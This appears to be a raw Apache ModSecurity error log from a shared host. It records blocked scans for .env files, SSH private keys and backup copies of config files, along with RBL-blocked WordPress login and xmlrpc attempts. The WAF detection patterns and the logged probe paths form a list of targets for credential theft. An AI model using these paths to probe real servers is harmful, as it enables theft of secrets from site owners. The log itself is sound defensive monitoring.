[Tue May 26 18:42:31.507147 2026] [security2:error] [pid 1015481:tid 1015620] [client 85.121.215.239:37902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.env.old"] [unique_id "ahWcP7QIKfWDMlp2INdiLgAAARM"]
[Tue May 26 18:42:32.836712 2026] [security2:error] [pid 1015481:tid 1015718] [client 124.43.5.103:50972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcQLQIKfWDMlp2INdiWAAAAXU"]
[Tue May 26 18:42:32.836826 2026] [security2:error] [pid 1015481:tid 1015718] [client 124.43.5.103:50972] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcQLQIKfWDMlp2INdiWAAAAXU"]
[Tue May 26 18:42:33.464246 2026] [security2:error] [pid 1015481:tid 1015675] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcQbQIKfWDMlp2INdiZAAAAUo"]
[Tue May 26 18:42:33.839541 2026] [security2:error] [pid 1015481:tid 1015606] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcQbQIKfWDMlp2INdiegABF3w"]
[Tue May 26 18:42:33.839713 2026] [security2:error] [pid 1015481:tid 1015624] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcQbQIKfWDMlp2INdiegABF3w"]
[Tue May 26 18:42:34.901670 2026] [security2:error] [pid 1015481:tid 1015629] [client 85.121.215.239:37890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.ssh/id_rsa"] [unique_id "ahWcQrQIKfWDMlp2INdimAAAARw"]
[Tue May 26 18:42:35.400155 2026] [security2:error] [pid 1015481:tid 1015720] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcQrQIKfWDMlp2INdipAAAAXc"]
[Tue May 26 18:42:37.340452 2026] [security2:error] [pid 1015481:tid 1015710] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcRLQIKfWDMlp2INdi3AAAAW0"]
[Tue May 26 18:42:37.768173 2026] [security2:error] [pid 1015481:tid 1015706] [client 123.24.30.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcRbQIKfWDMlp2INdi5wAAAWk"]
[Tue May 26 18:42:40.729657 2026] [security2:error] [pid 1015481:tid 1015681] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcSLQIKfWDMlp2INdjQQAAAVA"]
[Tue May 26 18:42:43.091560 2026] [security2:error] [pid 1015481:tid 1015716] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcSrQIKfWDMlp2INdjjQAAAXM"]
[Tue May 26 18:42:43.443794 2026] [security2:error] [pid 1015481:tid 1015667] [client 124.43.5.103:51253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcS7QIKfWDMlp2INdjnQAAAUI"]
[Tue May 26 18:42:43.444022 2026] [security2:error] [pid 1015481:tid 1015667] [client 124.43.5.103:51253] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcS7QIKfWDMlp2INdjnQAAAUI"]
[Tue May 26 18:42:43.647345 2026] [security2:error] [pid 1015481:tid 1015492] [remote 49.12.3.147:44170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcS7QIKfWDMlp2INdjoQABXwo"]
[Tue May 26 18:42:44.632555 2026] [security2:error] [pid 1015481:tid 1015541] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcTLQIKfWDMlp2INdjugABIzs"]
[Tue May 26 18:42:44.632752 2026] [security2:error] [pid 1015481:tid 1015636] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcTLQIKfWDMlp2INdjugABIzs"]
[Tue May 26 18:42:45.730457 2026] [security2:error] [pid 1015481:tid 1015666] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcTbQIKfWDMlp2INdj0QAAAUE"]
[Tue May 26 18:42:47.832604 2026] [security2:error] [pid 1015481:tid 1015647] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcT7QIKfWDMlp2INdkDQAAAS4"]
[Tue May 26 18:42:48.109354 2026] [security2:error] [pid 1015481:tid 1015598] [remote 103.91.67.202:65468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcT7QIKfWDMlp2INdkIwABenQ"]
[Tue May 26 18:42:51.114987 2026] [security2:error] [pid 1015481:tid 1015618] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcUrQIKfWDMlp2INdkgAAAARE"]
[Tue May 26 18:42:52.086419 2026] [security2:error] [pid 1015481:tid 1015532] [remote 160.250.186.220:41336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWcU7QIKfWDMlp2INdktAABfzI"]
[Tue May 26 18:42:52.131945 2026] [core:error] [pid 1015481:tid 1015658] [client 198.235.24.37:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:42:52.131961 2026] [core:error] [pid 1015481:tid 1015658] [client 198.235.24.37:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:42:54.096092 2026] [security2:error] [pid 1015481:tid 1015731] [client 124.43.5.103:51538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcVrQIKfWDMlp2INdk_gAAAYI"]
[Tue May 26 18:42:54.096268 2026] [security2:error] [pid 1015481:tid 1015731] [client 124.43.5.103:51538] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcVrQIKfWDMlp2INdk_gAAAYI"]
[Tue May 26 18:42:54.134289 2026] [security2:error] [pid 1015481:tid 1015618] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcVbQIKfWDMlp2INdk9QAAARE"]
[Tue May 26 18:42:55.111731 2026] [security2:error] [pid 1015481:tid 1015688] [client 92.222.108.103:32254] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWcV7QIKfWDMlp2INdlIwAAAVc"]
[Tue May 26 18:42:55.111812 2026] [security2:error] [pid 1015481:tid 1015688] [client 92.222.108.103:32254] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ktmadvance-senegal.com"] [uri "/robots.txt"] [unique_id "ahWcV7QIKfWDMlp2INdlIwAAAVc"]
[Tue May 26 18:42:55.139513 2026] [security2:error] [pid 1015481:tid 1015719] [client 149.104.9.93:58356] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWcVbQIKfWDMlp2INdk3gAAAXY"]
[Tue May 26 18:42:55.249665 2026] [security2:error] [pid 1015481:tid 1015555] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcV7QIKfWDMlp2INdlJwABOEk"]
[Tue May 26 18:42:55.249854 2026] [security2:error] [pid 1015481:tid 1015657] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcV7QIKfWDMlp2INdlJwABOEk"]
[Tue May 26 18:42:55.493204 2026] [security2:error] [pid 1015481:tid 1015711] [client 172.224.240.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWcV7QIKfWDMlp2INdlLAAAAW4"]
[Tue May 26 18:42:56.108907 2026] [security2:error] [pid 1015481:tid 1015692] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcV7QIKfWDMlp2INdlPAAAAVs"]
[Tue May 26 18:42:56.514125 2026] [security2:error] [pid 1015481:tid 1015624] [client 54.39.0.73:33136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ktmadvance-senegal.com"] [uri "/"] [unique_id "ahWcWLQIKfWDMlp2INdlUgAAARc"]
[Tue May 26 18:42:56.514241 2026] [security2:error] [pid 1015481:tid 1015624] [client 54.39.0.73:33136] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ktmadvance-senegal.com"] [uri "/"] [unique_id "ahWcWLQIKfWDMlp2INdlUgAAARc"]
[Tue May 26 18:42:58.643943 2026] [security2:error] [pid 1015481:tid 1015716] [client 5.255.122.176:2466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/app/.env"] [unique_id "ahWcWrQIKfWDMlp2INdlqgAAAXM"]
[Tue May 26 18:42:58.644779 2026] [security2:error] [pid 1015481:tid 1015660] [client 5.255.122.176:2478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/backend/.env"] [unique_id "ahWcWrQIKfWDMlp2INdlpwAAATs"]
[Tue May 26 18:42:58.645087 2026] [security2:error] [pid 1015481:tid 1015641] [client 5.255.122.176:39932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env"] [unique_id "ahWcWrQIKfWDMlp2INdlrQAAASg"]
[Tue May 26 18:42:58.674315 2026] [security2:error] [pid 1015481:tid 1015583] [remote 103.11.102.106:47474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcWrQIKfWDMlp2INdlkwABEmU"]
[Tue May 26 18:42:58.708868 2026] [security2:error] [pid 1015481:tid 1015712] [client 5.255.122.176:2476] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/api/.env"] [unique_id "ahWcWrQIKfWDMlp2INdltgAAAW8"]
[Tue May 26 18:42:58.957929 2026] [security2:error] [pid 1015481:tid 1015663] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcWrQIKfWDMlp2INdllgAAAT4"]
[Tue May 26 18:42:59.880952 2026] [security2:error] [pid 1015481:tid 1015681] [client 89.117.59.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcW7QIKfWDMlp2INdl3QAAAVA"]
[Tue May 26 18:43:00.678163 2026] [security2:error] [pid 1015481:tid 1015621] [client 5.255.122.176:2646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.copy"] [unique_id "ahWcXLQIKfWDMlp2INdmAAAAARQ"]
[Tue May 26 18:43:00.783844 2026] [security2:error] [pid 1015481:tid 1015715] [client 23.158.233.121:62841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWcW7QIKfWDMlp2INdl7wAAAXI"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 18:43:00.814303 2026] [security2:error] [pid 1015481:tid 1015554] [remote 111.229.141.137:54144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcXLQIKfWDMlp2INdl_wABS0g"]
[Tue May 26 18:43:00.819893 2026] [security2:error] [pid 1015481:tid 1015700] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcXLQIKfWDMlp2INdl_gAAAWM"]
[Tue May 26 18:43:01.448385 2026] [security2:error] [pid 1015481:tid 1015638] [client 5.255.122.176:2926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.bak"] [unique_id "ahWcXbQIKfWDMlp2INdmJAAAASU"]
[Tue May 26 18:43:01.451420 2026] [security2:error] [pid 1015481:tid 1015658] [client 5.255.122.176:2860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.backup"] [unique_id "ahWcXbQIKfWDMlp2INdmJQAAATk"]
[Tue May 26 18:43:01.452317 2026] [security2:error] [pid 1015481:tid 1015645] [client 5.255.122.176:2798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.swp"] [unique_id "ahWcXbQIKfWDMlp2INdmKQAAASw"]
[Tue May 26 18:43:01.452921 2026] [security2:error] [pid 1015481:tid 1015737] [client 5.255.122.176:2814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.orig"] [unique_id "ahWcXbQIKfWDMlp2INdmKgAAAYg"]
[Tue May 26 18:43:01.453508 2026] [security2:error] [pid 1015481:tid 1015711] [client 5.255.122.176:2964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.swp"] [unique_id "ahWcXbQIKfWDMlp2INdmKAAAAW4"]
[Tue May 26 18:43:01.453640 2026] [security2:error] [pid 1015481:tid 1015731] [client 5.255.122.176:2944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.backup"] [unique_id "ahWcXbQIKfWDMlp2INdmLgAAAYI"]
[Tue May 26 18:43:01.454374 2026] [security2:error] [pid 1015481:tid 1015634] [client 5.255.122.176:2764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.backup"] [unique_id "ahWcXbQIKfWDMlp2INdmLAAAASE"]
[Tue May 26 18:43:01.454518 2026] [security2:error] [pid 1015481:tid 1015675] [client 5.255.122.176:2904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.orig"] [unique_id "ahWcXbQIKfWDMlp2INdmLQAAAUo"]
[Tue May 26 18:43:01.454565 2026] [security2:error] [pid 1015481:tid 1015681] [client 5.255.122.176:2878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local~"] [unique_id "ahWcXbQIKfWDMlp2INdmJwAAAVA"]
[Tue May 26 18:43:01.454961 2026] [security2:error] [pid 1015481:tid 1015623] [client 5.255.122.176:2928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.production.old"] [unique_id "ahWcXbQIKfWDMlp2INdmNAAAARY"]
[Tue May 26 18:43:01.455004 2026] [security2:error] [pid 1015481:tid 1015702] [client 5.255.122.176:2754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.bak"] [unique_id "ahWcXbQIKfWDMlp2INdmMwAAAWU"]
[Tue May 26 18:43:01.455066 2026] [security2:error] [pid 1015481:tid 1015646] [client 5.255.122.176:2914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "goadityaholidays.com"] [uri "/.env.local.copy"] [unique_id "ahWcXbQIKfWDMlp2INdmMgAAAS0"]
